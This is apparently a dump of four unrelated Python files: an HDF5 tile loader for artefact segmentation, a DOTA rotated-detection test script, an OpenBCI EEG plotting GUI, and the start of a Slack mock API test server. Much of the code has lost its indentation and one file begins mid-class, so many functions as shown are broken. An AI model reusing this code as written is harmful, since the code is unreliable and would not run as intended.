self.cur_block_idx = cur_idx
self.next_block_idx = next_idx
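# Status values coordinating run() (loader thread) with get() (consumer):
#   0 - loading the current block from disk
#   1 - current block ready, waiting for the consumer to take it
#   2 - current block handed over, pre-fetching the next block
#   3 - next block ready, waiting for the consumer to swap and take it
#   4 - swapped block handed over, pre-fetching the following block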
def load_cur(self):
# print(f"{time.time()-self.t0:.3f} : load_cur")
with h5py.File(os.path.join(self.directory,f"artefact_tiles_block_{int(self.cur_block_idx)}_annos.h5"), 'r') as hf:
annos = hf["annos"][:]
with h5py.File(os.path.join(self.directory,f"artefact_tiles_block_{int(self.cur_block_idx)}_images.h5"), 'r') as hf:
images = hf["images"][:]
self.current_block = (images,annos)
def load_next(self):
# print(f"{time.time()-self.t0:.3f} : load_next")
if( self.next_block_idx == -1 ): return
with h5py.File(os.path.join(self.directory,f"artefact_tiles_block_{int(self.next_block_idx)}_annos.h5"), 'r') as hf:
annos = hf["annos"][:]
with h5py.File(os.path.join(self.directory,f"artefact_tiles_block_{int(self.next_block_idx)}_images.h5"), 'r') as hf:
images = hf["images"][:]
self.next_block = (images,annos)
def swap(self):
# print(f"{time.time()-self.t0:.3f} : swap")
self.current_block = self.next_block
del self.next_block
def get(self, cur_idx, next_idx):
# print(f"{time.time()-self.t0:.3f} : get({cur_idx},{next_idx}) [status={self.status}]")
if( self.status == 0 ):
self.cur_block_idx = cur_idx
self.next_block_idx = next_idx
return False,(None,None)
elif( self.status == 1 ):
self.status = 2
return True,self.current_block
elif( self.status == 2 ):
return False,(None,None)
elif( self.status == 3 ):
self.swap()
self.next_block_idx = next_idx
self.status = 4
return True,self.current_block
elif( self.status == 4 ):
return False,(None,None)
def run(self):
while True:
if self.status == 0:
self.load_cur()
self.status = 1
elif self.status == 1:
time.sleep(1) # wait for generator to get current
elif self.status == 2 or self.status == 4:
self.load_next()
self.status = 3
elif self.status == 3:
time.sleep(1) # wait for generator to get current
class ArtefactBlockGenerator(DataGenerator):
def __init__(self, **kwargs):
super().__init__(**kwargs)
if( self.timeit ): self.log_time += [{'event': 'init artefact generator', 'time': time.time()}]
training_blocks = [f'artefact_tiles_block_{block}_images.h5' for block in range(5)]
n_images = 0
positive_per_block = []
self.block_idxs = np.arange(5)
self.idxs_in_block = []
self.pos_idxs_in_block = []
for block in range(5):
with h5py.File(os.path.join(self.directory,f"artefact_tiles_block_{block}_annos.h5"), 'r') as hf:
annos = hf["annos"][:]
n_images += annos.shape[0]
positives = annos.max(axis=1).max(axis=1)>0
positive_per_block.append(positives)
idxs = np.arange(annos.shape[0])
self.idxs_in_block.append(idxs)
self.pos_idxs_in_block.append(np.array([idx for idx in idxs if positives[idx]]))
n_positive_images = sum([p.sum() for p in positive_per_block])
self.isset = True
self.split_train_val()
if( self.pPositive == 1. ):
self.batches_per_epoch = sum([p.sum()//self.batch_size for p in positive_per_block])
self.idxs_in_block = self.pos_idxs_in_block
else:
self.batches_per_epoch = sum([p.shape[0]//self.batch_size for p in self.idxs_in_block])
if( self.timeit ): self.log_time += [{'event': 'end init', 'time': time.time()}]
def split_train_val(self):
'''Doesn't care about the params, uses the predetermined split from the blocks'''
with h5py.File(os.path.join(self.directory,f"artefact_tiles_validation_annos.h5"), 'r') as hf:
self.validation_annos = hf["annos"][:20]
with h5py.File(os.path.join(self.directory,f"artefact_tiles_validation_images.h5"), 'r') as hf:
self.validation_images = hf["images"][:20]
def next_batch(self):
"""Yield batch_x, batch_y"""
if( not self.isset ):
raise ValueError(f"Cannot generate batch before dataset has been loaded.")
if( self.timeit ): self.log_time += [{'event': 'start next batch', 'time': time.time()}]
if( self.verbose ):
print(f'Starting {self.n_epochs} epochs.')
'''Generate sequence'''
np.random.seed(self.random_seed_sequence)
self.block_sequence = np.zeros((self.n_epochs, 5)).astype('int')
self.tile_sequence = [[[] for i in range(5)] for i in range(self.n_epochs)]
for e in range(self.n_epochs):
np.random.shuffle(self.block_idxs)
self.block_sequence[e,:] = self.block_idxs[:]
for bidx in self.block_idxs:
tiles_idxs = self.idxs_in_block[bidx]
np.random.shuffle(tiles_idxs)
self.tile_sequence[e][bidx] = tiles_idxs[:]
# self.block_sequence_flat = list(self.block_sequence.flatten()) + [-1,]
# self.block_loader = BlockLoader(self.directory, self.block_sequence_flat[0], self.block_sequence_flat[1])
# self.loader_thread = threading.Thread(target=self.block_loader.run)
# self.loader_thread.start()
for e in range(self.n_epochs):
if( self.timeit ): self.log_time += [{'event': 'start epoch', 'time': time.time()}]
for epoch in self.get_epoch(e):
yield epoch
# def load_block(self, cur_idx, next_idx):
# ready = False
# while not ready:
# ready,(block_x,block_y) = self.block_loader.get(cur_idx, next_idx)
# time.sleep(1)
# return block_x,block_y
def load_block(self, block):
with h5py.File(os.path.join(self.directory,f"artefact_tiles_block_{int(block)}_annos.h5"), 'r') as hf:
annos = hf["annos"][:]
with h5py.File(os.path.join(self.directory,f"artefact_tiles_block_{int(block)}_images.h5"), 'r') as hf:
images = hf["images"][:]
return images,annos
def get_epoch(self, e):
if( self.timeit ): self.log_time += [{'event': 'in get_epoch', 'time': time.time()}]
for block_idx in self.block_sequence[e]:
# for i in range(e*5, (e+1)*5):
if( self.timeit ): self.log_time += [{'event': 'in block loop', 'time': time.time()}]
# load block
block_x,block_y = self.load_block(block_idx)
# block_idx = self.block_sequence_flat[i]
# next_idx = self.block_sequence_flat[i+1]
# block_x,block_y = self.load_block(block_idx,next_idx)
tiles_idxs = self.tile_sequence[e][block_idx]
if( self.timeit ): self.log_time += [{'event': 'block loaded', 'time': time.time()}]
for idb in range(len(tiles_idxs)//self.batch_size):
batch_x = self._preprocess(np.array([block_x[idx] for idx in tiles_idxs[idb*self.batch_size:(idb+1)*self.batch_size]]))
batch_y_1 = np.array([block_y[idx] for idx in tiles_idxs[idb*self.batch_size:(idb+1)*self.batch_size]])
batch_y = np.zeros(list(batch_y_1.shape) + [2,])
batch_y[:,:,:,1] = batch_y_1
batch_y[:,:,:,0] = 1-batch_y[:,:,:,1]
if self.gamodel is not False:
for i in range(batch_y.shape[0]):
if batch_y[i,:,:,1].mean() < self.maxPositiveAreaForGenerator \
and np.random.random() < self.pNoise :
batch_y[i] = self.gamodel.predict(np.array([batch_x[i]]))
yield self._augment(*self._random_crop(batch_x, batch_y), idb)
del block_x # making sure we free RAM for next round
del block_y
gc.collect()
def _random_crop(self, batch_x, batch_y):
"""Randomly takes a cropped region of self.tile_size from each image in the mini batch"""
if( self.timeit ): self.log_time += [{'event': 'pre-crop', 'time': time.time()}]
shape_images = batch_y[0].shape
shape_tiles = self.batch_y_shape[1:3]
max_rt = np.array([shape_images[0]-shape_tiles[0], shape_images[1]-shape_tiles[1]])
rts = (np.random.random((batch_x.shape[0], 2))*(max_rt)).astype('int')
cropped_batch_x = np.zeros((len(batch_x),)+self.batch_x_shape[1:])
cropped_batch_y = np.zeros((len(batch_x),)+self.batch_y_shape[1:])
for i,(bx,by,rt) in enumerate(zip(batch_x,batch_y,rts)):
cropped_batch_x[i] = bx[rt[0]:rt[0]+self.tile_size[0],rt[1]:rt[1]+self.tile_size[1]]
cropped_batch_y[i] = by[rt[0]:rt[0]+self.tile_size[0],rt[1]:rt[1]+self.tile_size[1]]
if( self.timeit ): self.log_time += [{'event': 'random crop', 'time': time.time()}]
return cropped_batch_x,cropped_batch_y
def get_validation_set(self):
if( not self.isset ):
raise ValueError(f"Cannot get validation set before dataset has been loaded")
Xval = self._preprocess(self.validation_images)
Yval = np.zeros(Xval.shape[:3]+(2,))
Yval[:,:,:,1] = self.validation_annos
Yval[:,:,:,0] = 1-Yval[:,:,:,1]
return self._random_crop(Xval, Yval)
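
# --- Illustrative sketch (added by the editor, not part of the original loader) ---
# Shows, with plain NumPy only, the label encoding used in get_epoch() above: a binary
# annotation mask is expanded into a two-channel (background, foreground) one-hot map.
# The function name and array shapes below are made up for the demo.
import numpy as np

def to_two_channel(mask_batch):
    """mask_batch: (N, H, W) binary masks -> (N, H, W, 2) one-hot labels."""
    y = np.zeros(mask_batch.shape + (2,), dtype='float32')
    y[..., 1] = mask_batch       # foreground channel
    y[..., 0] = 1.0 - y[..., 1]  # background channel
    return y

# e.g. to_two_channel(np.zeros((4, 64, 64))).shape == (4, 64, 64, 2)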
|
test_dota_base_sota.py
|
# -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import sys
import tensorflow as tf
import cv2
import numpy as np
import math
from tqdm import tqdm
import argparse
from multiprocessing import Queue, Process
from utils import tools
from libs.label_name_dict.label_dict import LabelMap
from libs.utils.draw_box_in_img import DrawBox
from libs.utils.coordinate_convert import forward_convert, backward_convert
from libs.utils import nms_rotate
from libs.utils.rotate_polygon_nms import rotate_gpu_nms
from dataloader.pretrained_weights.pretrain_zoo import PretrainModelZoo
def parse_args():
parser = argparse.ArgumentParser('Start testing.')
parser.add_argument('--test_dir', dest='test_dir',
help='evaluate imgs dir ',
default='/data/dataset/DOTA/test/images/', type=str)
parser.add_argument('--gpus', dest='gpus',
help='gpu id',
default='0,1,2,3,4,5,6,7', type=str)
parser.add_argument('--show_box', '-s', default=False,
action='store_true')
parser.add_argument('--multi_scale', '-ms', default=False,
action='store_true')
parser.add_argument('--flip_img', '-f', default=False,
action='store_true')
parser.add_argument('--num_imgs', dest='num_imgs',
help='test image number',
default=np.inf, type=int)
    parser.add_argument('--h_len', dest='h_len',
                        help='image heights',
                        default=[600, 800, 1024, 1300, 1600], type=int, nargs='+')
    parser.add_argument('--w_len', dest='w_len',
                        help='image widths',
                        default=[600, 800, 1024, 1300, 1600], type=int, nargs='+')
    parser.add_argument('--h_overlap', dest='h_overlap',
                        help='height overlaps',
                        default=[150, 200, 300, 300, 400], type=int, nargs='+')
    parser.add_argument('--w_overlap', dest='w_overlap',
                        help='width overlaps',
                        default=[150, 200, 300, 300, 400], type=int, nargs='+')
args = parser.parse_args()
return args
class TestDOTA(object):
def __init__(self, cfgs):
self.cfgs = cfgs
self.args = parse_args()
label_map = LabelMap(cfgs)
self.name_label_map, self.label_name_map = label_map.name2label(), label_map.label2name()
def worker(self, gpu_id, images, det_net, result_queue):
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3]) # is RGB. not BGR
img_batch = tf.cast(img_plac, tf.float32)
pretrain_zoo = PretrainModelZoo()
if self.cfgs.NET_NAME in pretrain_zoo.pth_zoo or self.cfgs.NET_NAME in pretrain_zoo.mxnet_zoo:
img_batch = (img_batch / 255 - tf.constant(self.cfgs.PIXEL_MEAN_)) / tf.constant(self.cfgs.PIXEL_STD)
else:
img_batch = img_batch - tf.constant(self.cfgs.PIXEL_MEAN)
img_batch = tf.expand_dims(img_batch, axis=0)
detection_boxes, detection_scores, detection_category = det_net.build_whole_detection_network(
input_img_batch=img_batch)
init_op = tf.group(
tf.global_variables_initializer(),
tf.local_variables_initializer()
)
restorer, restore_ckpt = det_net.get_restorer()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
sess.run(init_op)
            if restorer is not None:
restorer.restore(sess, restore_ckpt)
print('restore model %d ...' % gpu_id)
for img_path in images:
# if 'P0302' not in img_path:
# continue
img = cv2.imread(img_path)
# img = np.load(img_path.replace('images', 'npy').replace('.png', '.npy'))
box_res_rotate = []
label_res_rotate = []
score_res_rotate = []
imgH = img.shape[0]
imgW = img.shape[1]
for h_len, w_len, h_overlap, w_overlap in zip(self.args.h_len, self.args.w_len, self.args.h_overlap, self.args.w_overlap):
img_short_side_len_list = self.cfgs.IMG_SHORT_SIDE_LEN if isinstance(self.cfgs.IMG_SHORT_SIDE_LEN, list) else [
self.cfgs.IMG_SHORT_SIDE_LEN]
img_short_side_len_list = [img_short_side_len_list[0]] if not self.args.multi_scale else img_short_side_len_list
if imgH < h_len:
temp = np.zeros([h_len, imgW, 3], np.float32)
temp[0:imgH, :, :] = img
img = temp
imgH = h_len
if imgW < w_len:
temp = np.zeros([imgH, w_len, 3], np.float32)
temp[:, 0:imgW, :] = img
img = temp
imgW = w_len
for hh in range(0, imgH, h_len - h_overlap):
if imgH - hh - 1 < h_len:
hh_ = imgH - h_len
else:
hh_ = hh
for ww in range(0, imgW, w_len - w_overlap):
if imgW - ww - 1 < w_len:
ww_ = imgW - w_len
else:
ww_ = ww
src_img = img[hh_:(hh_ + h_len), ww_:(ww_ + w_len), :]
for short_size in img_short_side_len_list:
max_len = self.cfgs.IMG_MAX_LENGTH
if h_len < w_len:
new_h, new_w = short_size, min(int(short_size * float(w_len) / h_len), max_len)
else:
new_h, new_w = min(int(short_size * float(h_len) / w_len), max_len), short_size
img_resize = cv2.resize(src_img, (new_w, new_h))
resized_img, det_boxes_r_, det_scores_r_, det_category_r_ = \
sess.run(
[img_batch, detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: img_resize[:, :, ::-1]}
)
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
src_h, src_w = src_img.shape[0], src_img.shape[1]
if len(det_boxes_r_) > 0:
det_boxes_r_ = forward_convert(det_boxes_r_, False)
det_boxes_r_[:, 0::2] *= (src_w / resized_w)
det_boxes_r_[:, 1::2] *= (src_h / resized_h)
for ii in range(len(det_boxes_r_)):
box_rotate = det_boxes_r_[ii]
box_rotate[0::2] = box_rotate[0::2] + ww_
box_rotate[1::2] = box_rotate[1::2] + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_[ii])
score_res_rotate.append(det_scores_r_[ii])
if self.args.flip_img:
det_boxes_r_flip, det_scores_r_flip, det_category_r_flip = \
sess.run(
[detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: cv2.flip(img_resize, flipCode=1)[:, :, ::-1]}
)
if len(det_boxes_r_flip) > 0:
det_boxes_r_flip = forward_convert(det_boxes_r_flip, False)
det_boxes_r_flip[:, 0::2] *= (src_w / resized_w)
det_boxes_r_flip[:, 1::2] *= (src_h / resized_h)
for ii in range(len(det_boxes_r_flip)):
box_rotate = det_boxes_r_flip[ii]
box_rotate[0::2] = (src_w - box_rotate[0::2]) + ww_
box_rotate[1::2] = box_rotate[1::2] + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_flip[ii])
score_res_rotate.append(det_scores_r_flip[ii])
det_boxes_r_flip, det_scores_r_flip, det_category_r_flip = \
sess.run(
[detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: cv2.flip(img_resize, flipCode=0)[:, :, ::-1]}
)
if len(det_boxes_r_flip) > 0:
det_boxes_r_flip = forward_convert(det_boxes_r_flip, False)
det_boxes_r_flip[:, 0::2] *= (src_w / resized_w)
det_boxes_r_flip[:, 1::2] *= (src_h / resized_h)
for ii in range(len(det_boxes_r_flip)):
box_rotate = det_boxes_r_flip[ii]
box_rotate[0::2] = box_rotate[0::2] + ww_
box_rotate[1::2] = (src_h - box_rotate[1::2]) + hh_
box_res_rotate.append(box_rotate)
label_res_rotate.append(det_category_r_flip[ii])
score_res_rotate.append(det_scores_r_flip[ii])
box_res_rotate = np.array(box_res_rotate)
label_res_rotate = np.array(label_res_rotate)
score_res_rotate = np.array(score_res_rotate)
box_res_rotate_ = []
label_res_rotate_ = []
score_res_rotate_ = []
threshold = {'roundabout': 0.1, 'tennis-court': 0.3, 'swimming-pool': 0.1, 'storage-tank': 0.2,
'soccer-ball-field': 0.3, 'small-vehicle': 0.2, 'ship': 0.2, 'plane': 0.3,
'large-vehicle': 0.1, 'helicopter': 0.2, 'harbor': 0.0001, 'ground-track-field': 0.3,
'bridge': 0.0001, 'basketball-court': 0.3, 'baseball-diamond': 0.3}
for sub_class in range(1, self.cfgs.CLASS_NUM + 1):
index = np.where(label_res_rotate == sub_class)[0]
if len(index) == 0:
continue
tmp_boxes_r = box_res_rotate[index]
tmp_label_r = label_res_rotate[index]
tmp_score_r = score_res_rotate[index]
tmp_boxes_r_ = backward_convert(tmp_boxes_r, False)
# try:
# inx = nms_rotate.nms_rotate_cpu(boxes=np.array(tmp_boxes_r_),
# scores=np.array(tmp_score_r),
# iou_threshold=threshold[self.label_name_map[sub_class]],
# max_output_size=5000)
#
# except:
tmp_boxes_r_ = np.array(tmp_boxes_r_)
tmp = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
tmp[:, 0:-1] = tmp_boxes_r_
tmp[:, -1] = np.array(tmp_score_r)
# Note: the IoU of two same rectangles is 0, which is calculated by rotate_gpu_nms
jitter = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
jitter[:, 0] += np.random.rand(tmp_boxes_r_.shape[0], ) / 1000
inx = rotate_gpu_nms(np.array(tmp, np.float32) + np.array(jitter, np.float32),
float(threshold[self.label_name_map[sub_class]]), 0)
box_res_rotate_.extend(np.array(tmp_boxes_r)[inx])
score_res_rotate_.extend(np.array(tmp_score_r)[inx])
label_res_rotate_.extend(np.array(tmp_label_r)[inx])
result_dict = {'boxes': np.array(box_res_rotate_), 'scores': np.array(score_res_rotate_),
'labels': np.array(label_res_rotate_), 'image_id': img_path}
result_queue.put_nowait(result_dict)
def test_dota(self, det_net, real_test_img_list, txt_name):
save_path = os.path.join('/data2/pd/sdc/shipdet/v1/works_dir/rodet/test_dota', self.cfgs.VERSION)
nr_records = len(real_test_img_list)
pbar = tqdm(total=nr_records)
gpu_num = len(self.args.gpus.strip().split(','))
nr_image = math.ceil(nr_records / gpu_num)
result_queue = Queue(500)
procs = []
for i, gpu_id in enumerate(self.args.gpus.strip().split(',')):
start = i * nr_image
end = min(start + nr_image, nr_records)
split_records = real_test_img_list[start:end]
proc = Process(target=self.worker, args=(int(gpu_id), split_records, det_net, result_queue))
print('process:%d, start:%d, end:%d' % (i, start, end))
proc.start()
procs.append(proc)
for i in range(nr_records):
res = result_queue.get()
if self.args.show_box:
nake_name = res['image_id'].split('/')[-1]
tools.makedirs(os.path.join(save_path, 'dota_img_vis'))
draw_path = os.path.join(save_path, 'dota_img_vis', nake_name)
draw_img = np.array(cv2.imread(res['image_id']), np.float32)
detected_boxes = backward_convert(res['boxes'], with_label=False)
detected_indices = res['scores'] >= self.cfgs.VIS_SCORE
detected_scores = res['scores'][detected_indices]
detected_boxes = detected_boxes[detected_indices]
detected_categories = res['labels'][detected_indices]
drawer = DrawBox(self.cfgs)
final_detections = drawer.draw_boxes_with_label_and_scores(draw_img,
boxes=detected_boxes,
labels=detected_categories,
scores=detected_scores,
method=1,
is_csl=True,
in_graph=False)
cv2.imwrite(draw_path, final_detections)
else:
CLASS_DOTA = self.name_label_map.keys()
write_handle = {}
tools.makedirs(os.path.join(save_path, 'dota_res'))
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class] = open(os.path.join(save_path, 'dota_res', 'Task1_%s.txt' % sub_class), 'a+')
for i, rbox in enumerate(res['boxes']):
command = '%s %.3f %.1f %.1f %.1f %.1f %.1f %.1f %.1f %.1f\n' % (res['image_id'].split('/')[-1].split('.')[0],
res['scores'][i],
rbox[0], rbox[1], rbox[2], rbox[3],
rbox[4], rbox[5], rbox[6], rbox[7],)
write_handle[self.label_name_map[res['labels'][i]]].write(command)
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class].close()
fw = open(txt_name, 'a+')
fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
fw.close()
pbar.set_description("Test image %s" % res['image_id'].split('/')[-1])
pbar.update(1)
for p in procs:
p.join()
def get_test_image(self):
txt_name = '{}.txt'.format(self.cfgs.VERSION)
if not self.args.show_box:
if not os.path.exists(txt_name):
fw = open(txt_name, 'w')
fw.close()
fr = open(txt_name, 'r')
img_filter = fr.readlines()
print('****************************' * 3)
print('Already tested imgs:', img_filter)
print('****************************' * 3)
fr.close()
test_imgname_list = [os.path.join(self.args.test_dir, img_name) for img_name in os.listdir(self.args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff')) and
(img_name + '\n' not in img_filter)]
else:
test_imgname_list = [os.path.join(self.args.test_dir, img_name) for img_name in os.listdir(self.args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]
        assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' \
                                            ' Note that we only support img formats of (.jpg, .jpeg, .png, .tif, and .tiff).'
if self.args.num_imgs == np.inf:
real_test_img_list = test_imgname_list
else:
real_test_img_list = test_imgname_list[: self.args.num_imgs]
return real_test_img_list
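
# --- Illustrative sketch (added by the editor, not part of the original test script) ---
# A standalone version of the sliding-window offset logic used in worker() above:
# windows of size `win` step by `win - overlap`, and any window that would run past the
# border is clamped to end at the border (so the last offsets can repeat; the duplicate
# detections are removed later by the rotated NMS). The numbers below are made up.
def window_offsets(img_size, win, overlap):
    offsets = []
    for start in range(0, img_size, win - overlap):
        if img_size - start - 1 < win:
            offsets.append(img_size - win)   # clamp the last window to the border
        else:
            offsets.append(start)
    return offsets

# e.g. window_offsets(1500, 600, 150) -> [0, 450, 900, 900]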
|
Captura.py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'Gui_bases.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
#########################################################
import sys
sys.path.append('C:/Python37/Lib/site-packages')
from IPython.display import clear_output
from pyqtgraph.Qt import QtGui, QtCore, QtWidgets
from PyQt5 import QtWidgets
import pyqtgraph as pg
import random
from pyOpenBCI import OpenBCICyton
import threading
import time
import numpy as np
from scipy import signal
##########################################################
from PyQt5 import QtCore, QtGui, QtWidgets
from pyqtgraph import PlotWidget, GraphicsLayoutWidget
pg.setConfigOption('background', 'w')
pg.setConfigOption('foreground', 'k')
data = [[0,0,0,0,0,0,0,0]]
SCALE_FACTOR = (4500000)/24/(2**23-1) #From the pyOpenBCI repo
colors = 'rgbycmwr'
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1150, 699)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.graphicsView = GraphicsLayoutWidget(self.centralwidget)
self.graphicsView.setGeometry(QtCore.QRect(180, 10, 931, 651))
self.graphicsView.setObjectName("graphicsView")
self.ts_plots = [self.graphicsView.addPlot(row=i, col=0, colspan=2, title='Channel %d' % i, labels={'left': 'uV'}) for i in range(1,9)]
self.pushButton = QtWidgets.QPushButton(self.centralwidget)
self.pushButton.setGeometry(QtCore.QRect(10, 500, 131, 41))
self.pushButton.setObjectName("pushButton")
self.pushButton_2 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_2.setGeometry(QtCore.QRect(10, 390, 131, 41))
self.pushButton_2.setObjectName("pushButton_2")
self.pushButton_3 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_3.setGeometry(QtCore.QRect(10, 60, 141, 41))
self.pushButton_3.setObjectName("pushButton_3")
self.lcdNumber = QtWidgets.QLCDNumber(self.centralwidget)
self.lcdNumber.setGeometry(QtCore.QRect(20, 250, 111, 61))
self.lcdNumber.setSmallDecimalPoint(True)
self.lcdNumber.setDigitCount(3)
self.lcdNumber.setSegmentStyle(QtWidgets.QLCDNumber.Flat)
self.lcdNumber.setObjectName("lcdNumber")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(100, 140, 61, 41))
self.label.setObjectName("label")
self.textEdit = QtWidgets.QTextEdit(self.centralwidget)
self.textEdit.setGeometry(QtCore.QRect(20, 140, 71, 41))
self.textEdit.setObjectName("textEdit")
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.pushButton.setText(_translate("MainWindow", "SALIR"))
self.pushButton_2.setText(_translate("MainWindow", "INICIO"))
self.pushButton_3.setText(_translate("MainWindow", "ACTUALIZAR"))
self.label.setText(_translate("MainWindow", "SEGUNDOS."))
################################################################################
def save_data(self,sample):
global data
data.append([i*SCALE_FACTOR for i in sample.channels_data])
def updater(self):
global data, plots, colors
t_data = np.array(data[-1250:]).T #transpose data
fs = 250 #Hz
# Plot a time series of the raw data
for j in range(8):
self.ts_plots[j].clear()
# self.ts_plots[j].plot(t_data[j])
self.ts_plots[j].plot(pen=colors[j]).setData(t_data[j])
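
# --- Illustrative sketch (added by the editor, not part of the original GUI) ---
# `scipy.signal` is imported above but never used; this is one way it could be applied
# to clean a channel before plotting: a 50 Hz notch for mains hum plus a 1-50 Hz
# band-pass. The cut-off values and function name are assumptions, not taken from the
# original script; e.g. updater() could call setData(filter_channel(t_data[j])).
def filter_channel(x, fs=250.0):
    b_notch, a_notch = signal.iirnotch(w0=50.0, Q=30.0, fs=fs)               # mains-hum notch
    b_band, a_band = signal.butter(4, [1.0, 50.0], btype='bandpass', fs=fs)  # 1-50 Hz band-pass
    x = signal.filtfilt(b_notch, a_notch, x)                                 # zero-phase filtering
    return signal.filtfilt(b_band, a_band, x)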
def start_board(): # Thread routine: configure the Cyton board and read data
    board = OpenBCICyton("COM8", daisy=False) # Instantiate the OpenBCICyton class.
    board.start_stream(ui.save_data) # Call the data-streaming method with our callback.
if __name__ == "__main__":
    if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):  # check that Python is not running interactively and that PyQt5 is installed
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
        x = threading.Thread(target=start_board)  # create a thread running start_board
        x.daemon = True  # mark it as a daemon (it ends when the main thread ends)
        x.start()  # start the thread
        timer = QtCore.QTimer()  # PyQt5 timer
        timer.timeout.connect(ui.updater)  # refresh the plots
        timer.start(0)  # pending: pick a refresh interval (0 = fire on every event-loop pass)
sys.exit(app.exec_())
|
mock_web_api_server.py
|
import asyncio
import json
import logging
import re
import sys
import threading
import time
from http import HTTPStatus
from http.server import HTTPServer, SimpleHTTPRequestHandler
from multiprocessing.context import Process
from typing import Type
from unittest import TestCase
from urllib.parse import urlparse, parse_qs
from urllib.request import Request, urlopen
from tests.helpers import get_mock_server_mode
class MockHandler(SimpleHTTPRequestHandler):
protocol_version = "HTTP/1.1"
default_request_version = "HTTP/1.1"
logger = logging.getLogger(__name__)
pattern_for_language = re.compile("python/(\\S+)", re.IGNORECASE)
pattern_for_package_identifier = re.compile("slackclient/(\\S+)")
html_response_body = '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /api/team.info was not found on this server.</p>\n</body></html>\n'
error_html_response_body = '<!DOCTYPE html>\n<html lang="en">\n<head>\n\t<meta charset="utf-8">\n\t<title>Server Error | Slack</title>\n\t<meta name="author" content="Slack">\n\t<style></style>\n</head>\n<body>\n\t<nav class="top persistent">\n\t\t<a href="https://status.slack.com/" class="logo" data-qa="logo"></a>\n\t</nav>\n\t<div id="page">\n\t\t<div id="page_contents">\n\t\t\t<h1>\n\t\t\t\t<svg width="30px" height="27px" viewBox="0 0 60 54" class="warning_icon"><path d="" fill="#D94827"/></svg>\n\t\t\t\tServer Error\n\t\t\t</h1>\n\t\t\t<div class="card">\n\t\t\t\t<p>It seems like there’s a problem connecting to our servers, and we’re investigating the issue.</p>\n\t\t\t\t<p>Please <a href="https://status.slack.com/">check our Status page for updates</a>.</p>\n\t\t\t</div>\n\t\t</div>\n\t</div>\n\t<script type="text/javascript">\n\t\tif (window.desktop) {\n\t\t\tdocument.documentElement.className = \'desktop\';\n\t\t}\n\n\t\tvar FIVE_MINS = 5 * 60 * 1000;\n\t\tvar TEN_MINS = 10 * 60 * 1000;\n\n\t\tfunction randomBetween(min, max) {\n\t\t\treturn Math.floor(Math.random() * (max - (min + 1))) + min;\n\t\t}\n\n\t\twindow.setTimeout(function () {\n\t\t\twindow.location.reload(true);\n\t\t}, randomBetween(FIVE_MINS, TEN_MINS));\n\t</script>\n</body>\n</html>'
def is_valid_user_agent(self):
user_agent = self.headers["User-Agent"]
return self.pattern_for_language.search(
user_agent
) and self.pattern_for_package_identifier.search(user_agent)
def is_valid_token(self):
if self.path.startswith("oauth"):
return True
return "Authorization" in self.headers and str(
self.headers["Authorization"]
).startswith("Bearer xoxb-")
def set_common_headers(self):
self.send_header("content-type", "application/json;charset=utf-8")
self.send_header("connection", "close")
self.end_headers()
invalid_auth = {
"ok": False,
"error": "invalid_auth",
}
not_found = {
"ok": False,
"error": "test_data_not_found",
}
def _handle(self):
try:
if self.path == "/received_requests.json":
self.send_response(200)
self.set_common_headers()
self.wfile.write(json.dumps(self.received_requests).encode("utf-8"))
return
if self.path in {"/oauth.access", "/oauth.v2.access"}:
self.send_response(200)
self.set_common_headers()
if self.headers["authorization"] == "Basic MTExLjIyMjpzZWNyZXQ=":
self.wfile.write("""{"ok":true}""".encode("utf-8"))
return
else:
self.wfile.write(
"""{"ok":false, "error":"invalid"}""".encode("utf-8")
)
return
if self.is_valid_token() and self.is_valid_user_agent():
parsed_path = urlparse(self.path)
len_header = self.headers.get("Content-Length") or 0
content_len = int(len_header)
post_body = self.rfile.read(content_len)
request_body = None
if post_body:
try:
post_body = post_body.decode("utf-8")
if post_body.startswith("{"):
request_body = json.loads(post_body)
else:
request_body = {
k: v[0] for k, v in parse_qs(post_body).items()
}
except UnicodeDecodeError:
pass
else:
if parsed_path and parsed_path.query:
request_body = {
k: v[0] for k, v in parse_qs(parsed_path.query).items()
}
header = self.headers["authorization"]
pattern = str(header).split("xoxb-", 1)[1]
if pattern.isnumeric():
self.send_response(int(pattern))
